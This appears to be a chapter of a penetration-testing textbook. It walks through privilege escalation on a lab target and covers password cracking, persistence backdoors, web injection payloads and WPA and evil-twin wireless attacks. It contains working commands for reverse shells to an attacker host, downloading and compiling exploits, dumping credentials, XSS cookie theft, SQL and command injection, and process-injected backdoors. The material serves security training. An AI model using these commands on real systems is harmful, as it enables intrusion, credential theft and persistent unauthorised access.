After successfully exploitting a target system, the initial access level is often limited, typically matching the privileges of the compromised service account (e.g., www-data for a web server). This chapter details methods to elevate these privileges and establish persistent access mechanisms to ensure continued control over the target system.

Privilege Escalation

Privilege escalation involves exploiting vulnerabilities to gain higher-level access on a system. Two primary types exist:

• Vertical Escalation: A lower-privileged user gains access to functions intended for higher-privileged users (e.g., a CMS user accessing admin functions).
• Horizontal Escalation: A standard user accesses functions intended for another user at the same privilege level (e.g., User A accessing User B's banking menu).

Common vectors include local exploits, configuraton errors (e.g., accessible SSH keys), weak passwords, credential sniffing, and packet spoofing.

Local Privilege Escalation via Exploit

This demonstration uses Metasploitable 2 as the target and Kali Linux as the attacker.

1. Service Identification: Scan the target (172.16.43.156) to identify open services.

   nmap -p- 172.16.43.156
   

2. Vulnerability Research: Research reveals the distccd service (used for distributed compilation) is vulnerable to remote command execution.
3. Exploitation with Metasploit: Search for and execute the relevant exploit.

   msfconsole
   search distccd
   use exploit/unix/misc/distcc_exec
   set RHOSTS 172.16.43.156
   exploit
   

   Successful exploitation yields a shell with daemon user privileges.
4. Information Gathering: Check the kernel version to find a suitable local privilege escalation exploit.

   uname -r
   # Output: 2.6.24-16-server
   

5. Exploit Transfer: An exploit for the udev service (CVE-2009-1185) is identified (exploit-db.com/exploits/8572). Copy it to a web-accessible directory on the attacker machine and start a web server.

   cp /usr/share/exploitdb/platforms/linux/local/8572.c /var/www/html/
   service apache2 start
   

6. Download and Compile on Target: From the compromised shell, download and compile the exploit.

   wget http://<ATTACKER_IP>/8572.c
   gcc 8572.c -o priv_esc_exploit
   

7. Exploit Preparation: The exploit requires the PID of the udevd netlink socket. Find it and prepare a reverse shell payload.

   cat /proc/net/netlink
   # Or: ps aux | grep udev
   echo '#!/bin/sh' > /tmp/revshell
   echo '/bin/netcat -e /bin/sh <ATTACKER_IP> 4444' >> /tmp/revshell
   chmod +x /tmp/revshell
   

8. Listener Setup and Execution: On the attacker machine, start a Netcat listener, then run the exploit on the target with the found PID.

   nc -lvp 4444
   # On target:
   ./priv_esc_exploit <UDEV_PID>
   

9. Result: The Netcat listener receives a connection, and issuing the whoami command confirms root acces.

Password Attack Tools

Password-based authentication remains widespread. Testing password strength is a critical part of penetration testing.

Offline Attack Tools

These tools crack password hashes after they have been obtained from the target (e.g., from /etc/shadow, database dumps).

John the Ripper

A fast, versatile password cracker supporting many hash types.

1. Preparing Hashes: On Unix-like systems, combine /etc/passwd and /etc/shadow.

   unshadow /etc/passwd /etc/shadow > combined_hashes.txt
   

2. Cracking: Run John using its default cracking modes (single, wordlist, incremental).

   john combined_hashes.txt
   

3. Viewing Results:

   john --show combined_hashes.txt
   

Ophcrack

A rainbow-table-based cracker, effective against Windows LM/NTLM hashes. It requires precomputed tables (e.g., tables_xp_free_fast).

ophcrack-cli -d /path/to/tables/ -t xp_free_fast -f extracted_hashes.txt

samdump2

Extracts Windows password hashes from the SYSTEM and SAM registry files without needing the SysKey.

samdump2 SYSTEM.bak SAM.bak -o win_hashes.txt

Online Attack Tools

These tools perform authentication attempts directly against a network service (e.g., SSH, FTP, VNC).

CeWL (Custom Word List Generator)

Generates a unique wordlist by spidering a target website.

cewl -w custom_wordlist.txt -d 2 http://target.site

Hydra

A fast, parallelized network login cracker.

# Example: Brute-force VNC password
hydra -P passwords.txt 192.168.1.10 vnc

Mimikatz (within Metasploit)

A post-exploitation tool for credential extraction from Windows memory.

meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::logonPasswords

Maintaining Access

Establishing persistence ensures access remains even if the initial vulnerability is patched.

OS-Level Backdoors

Cymothoa

Injects shellcode into an existing process, hiding the backdoor within a legitimate process.

# Find PID to inject into (e.g., a stable process like sshd)
ps aux | grep sshd
# Inject shellcode (payload 1 binds to port 4444)
cymothoa -p <PID> -s 1 -y 4444

Connect to the backdoor: nc -nv <TARGET_IP> 4444.

Meterpreter Persistence (metsvc)

Creates a persistent backdoor service via Metasploit.

meterpreter > run metsvc
# Later, connect using the multi/handler with the metsvc payload

Remove with: meterpreter > run metsvc -r.

Web Application Testing

Web apps are a primary attack vector. Testing involves reconnaissance, vulnerability scanning, and exploitation.

Reconnaissance & Scanning

Nikto

A web server scanner that checks for dangerous files, outdated versions, and configuration issues.

nikto -h http://target.site -p 80

OWASP ZAP

An integrated penetration testing tool for finding vulnerabilities in web applications.

owasp-zap

Burp Suite

A comprehensive platform for web security testing (Proxy, Spider, Scanner, Entruder, Repeater).

burpsuite

Exploitation Techniques

Cross-Site Scripting (XSS)

Reflected XSS Test (DVWA):

<script>alert('XSS Test');</script>

Stored XSS Test: Inject a script in to a comment or message field that executes for all visitors.

<script>alert(document.cookie);</script>

SQL Injection

Manual Testing (DVWA):

' OR '1'='1
' UNION SELECT null, user() #
' UNION SELECT null, table_name FROM information_schema.tables #

Automated with sqlmap:

sqlmap -u "http://target.site/page.php?id=1" --cookie="sessionid=abc123" --dbs

Command Injection, Directory Traversal, File Inclusion

Command Injection (DVWA):

127.0.0.1; whoami
127.0.0.1; cat /etc/passwd

Directory Traversal / Local File Inclusion (LFI):

../../../../etc/passwd

Remote File Inclusion (RFI):

http://attacker.site/malicious.txt

Wireless Penetration Testing

Reconnaissance

Kismet

A wireless network detector, sniffer, and IDS.

kismet

Aircrack-ng Suite

A complete suite for wireless network auditing.

1. Set interface to monitor mode:

   airmon-ng start wlan0
   

2. Scan for networks:

   airodump-ng wlan0mon
   

Attacking WPA/WPA2

1. Capture the 4-way handshake:

   airodump-ng -c <CHANNEL> --bssid <BSSID> -w capture wlan0mon
   

2. Deauthenticate a client (if needed) to force re-authentication:

   aireplay-ng -0 3 -a <BSSID> -c <CLIENT_MAC> wlan0mon
   

3. Crack the handshake with a wordlist:

   aircrack-ng -w rockyou.txt -b <BSSID> capture-01.cap
   

Rogue Access Point (Evil Twin)

1. Create a fake AP with the same SSID:

   airbase-ng -e "Target WiFi" -c <CHANNEL> wlan0mon
   

2. Configure DHCP and DNS (dnsmasq) to serve clients.
3. Capture credentials or conduct further MitM attacks.

Post-Connection Activities

• MAC Address Spoofing (to bypass MAC filtering):

  macchanger -m <SPOOFED_MAC> wlan0
  

• Sniffing Traffic (with Wireshark, after providing the WPA key in Wireshark's 802.11 protocol settings).
• Attacking the Router's admin interface using default or cracked credentials.